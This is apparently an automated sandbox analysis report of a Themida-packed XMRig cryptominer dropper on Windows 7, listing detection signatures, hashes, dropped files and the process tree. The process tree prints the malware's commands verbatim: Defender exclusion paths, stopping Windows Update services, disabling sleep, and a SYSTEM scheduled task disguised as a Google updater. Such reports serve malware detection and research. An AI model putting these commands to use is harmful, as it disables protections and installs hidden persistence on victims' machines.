Overview

overview

10

Static

static

7

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    301s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    24/04/2023, 22:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe

  • Size

    13.7MB

  • MD5

    3f44d752bae1088e80da33fb347aaab8

  • SHA1

    1157ccf838ddfa008433756e717767f458262891

  • SHA256

    42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc

  • SHA512

    ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb

  • SSDEEP

    393216:3iVaLvTzIErk836L3FLgG8X34MU9DSx5k:3iVaPzIgkm6L234MU9ci

Score
10/10
xmrigevasionminerthemidatrojan

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • XMRig Miner payload 26 IoCs
    miner
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
    evasion
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1256
      • C:\Users\Admin\AppData\Local\Temp\42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe
        "C:\Users\Admin\AppData\Local\Temp\42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Drops file in Drivers directory
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1236
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:528
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:984
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1516
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:584
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:1928
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1092
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1032
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#machcb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:804
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1424
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:772
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1848
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:1964
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1556
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:1772
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:1392
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:1632
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1764
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1348
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1360
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#machcb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1612
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:332
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:592
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1324
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {5FD3141A-2B1F-457F-807A-6A4626BF97DF} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:948
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Drops file in Drivers directory
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1316

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          13.7MB

          MD5

          3f44d752bae1088e80da33fb347aaab8

          SHA1

          1157ccf838ddfa008433756e717767f458262891

          SHA256

          42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc

          SHA512

          ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb

          Download Submit

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          13.7MB

          MD5

          3f44d752bae1088e80da33fb347aaab8

          SHA1

          1157ccf838ddfa008433756e717767f458262891

          SHA256

          42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc

          SHA512

          ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          18d4aee5e2089215ec82d6b98f839102

          SHA1

          3cb6367897d8fcdc940af49a1dca44efc0a4a30a

          SHA256

          7cd7ed255f96e57e4eaa308079086ea91509fddf082022b19ccbbb83c1b7cecd

          SHA512

          f87bd7eb71cba2879989fc845a4d6015f26985499d0ef7026ee1887f68014af6d45a7bc414d8fa19c6c46c5c9fb30cec942a89f319918a49c6981703cf7b5aae

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QBIQBR9IE1EKUY85198.temp
          Filesize

          7KB

          MD5

          18d4aee5e2089215ec82d6b98f839102

          SHA1

          3cb6367897d8fcdc940af49a1dca44efc0a4a30a

          SHA256

          7cd7ed255f96e57e4eaa308079086ea91509fddf082022b19ccbbb83c1b7cecd

          SHA512

          f87bd7eb71cba2879989fc845a4d6015f26985499d0ef7026ee1887f68014af6d45a7bc414d8fa19c6c46c5c9fb30cec942a89f319918a49c6981703cf7b5aae

          Download Submit

        • C:\Windows\System32\drivers\etc\hosts
          Filesize

          2KB

          MD5

          3e9af076957c5b2f9c9ce5ec994bea05

          SHA1

          a8c7326f6bceffaeed1c2bb8d7165e56497965fe

          SHA256

          e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

          SHA512

          933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

          Download Submit

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          13.7MB

          MD5

          3f44d752bae1088e80da33fb347aaab8

          SHA1

          1157ccf838ddfa008433756e717767f458262891

          SHA256

          42a889b58058605ab9ed440ac71acfd607441fa41277a3549a2be446dd2552cc

          SHA512

          ea912515fb7d4909c54739667a4fcb0c76419e0779d1a943ab7ec4b2d490e97d955ee018d114451e7e9160e097242940906f8118a6a02d81cbb53002106adafb

          Download Submit

        • memory/592-94-0x0000000140000000-0x000000014002A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/592-99-0x0000000140000000-0x000000014002A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/804-74-0x000000000271B000-0x0000000002752000-memory.dmp

          Filesize

          220KB

          Download

        • memory/804-70-0x00000000023A0000-0x00000000023A8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/804-72-0x0000000002710000-0x0000000002790000-memory.dmp

          Filesize

          512KB

          Download

        • memory/804-73-0x0000000002710000-0x0000000002790000-memory.dmp

          Filesize

          512KB

          Download

        • memory/804-69-0x000000001B180000-0x000000001B462000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/804-71-0x0000000002710000-0x0000000002790000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1236-59-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1236-62-0x00000000025EB000-0x0000000002622000-memory.dmp

          Filesize

          220KB

          Download

        • memory/1236-60-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1236-61-0x00000000025E4000-0x00000000025E7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1264-76-0x000000013F580000-0x000000014038E000-memory.dmp

          Filesize

          14.1MB

          Download

        • memory/1264-54-0x000000013F580000-0x000000014038E000-memory.dmp

          Filesize

          14.1MB

          Download

        • memory/1316-80-0x000000013F8D0000-0x00000001406DE000-memory.dmp

          Filesize

          14.1MB

          Download

        • memory/1316-91-0x000000013F8D0000-0x00000001406DE000-memory.dmp

          Filesize

          14.1MB

          Download

        • memory/1324-93-0x0000000000390000-0x00000000003B0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1324-116-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-146-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-144-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-142-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-95-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-97-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-98-0x0000000000390000-0x00000000003B0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1324-140-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-100-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-102-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-104-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-106-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-108-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-110-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-112-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-114-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-92-0x0000000000140000-0x0000000000160000-memory.dmp

          Filesize

          128KB

          Download

        • memory/1324-118-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-120-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-122-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-124-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-126-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-128-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-130-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-132-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-134-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-136-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1324-138-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/1612-85-0x00000000011D4000-0x00000000011D7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1612-86-0x00000000011DB000-0x0000000001212000-memory.dmp

          Filesize

          220KB

          Download

        • memory/1848-81-0x0000000000E84000-0x0000000000E87000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1848-82-0x0000000000E8B000-0x0000000000EC2000-memory.dmp

          Filesize

          220KB

          Download